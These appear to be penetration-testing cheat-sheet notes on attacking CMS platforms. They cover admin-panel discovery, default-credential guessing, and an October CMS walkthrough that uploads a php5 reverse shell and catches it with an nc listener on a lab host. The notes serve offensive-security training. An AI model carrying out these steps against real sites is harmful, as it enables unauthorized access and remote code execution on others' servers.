Content Management (CMS)

Common

• Wordpress

• Magento

Basics

• Analyze:

  • Version

  • Addons

  • Themes

  • Blog Posts

• Vulnerabilities

  • Start with Unauthenticated

• Backend Admin Panel

  • dirb, gobuster

  • Panel Finder: https://github.com/s0md3v/Breacher

  • Guess, Default Creds, Brute-Force

October CMS

• Open source self-hosted CMS platform

• Based on the Laravel PHP

• Look for unauthenticated exploits:

  • searchsploit october

  • Found: Vulnerable Upload php5 (authenticated)

• Google: "Vanilla forum download"

• Admin Panel:

  • Google "october cms admin login"

  • dirb http://10.x.x.x

  • http://10.x.x.x/backend

  • Try guessing: admin/admin

• Upload php5

  • October > Admin > Media > Upload > oct.php5

  • Execute has a button

  • Catch with nc reverse shell or msfconsole

> locate php-reverse-shell.php
> cp php-reverse-shell.php .
> vim php-reverse-shell.php
(upload through GUI/Webpage)
> nc -nvlp 4444
connected !!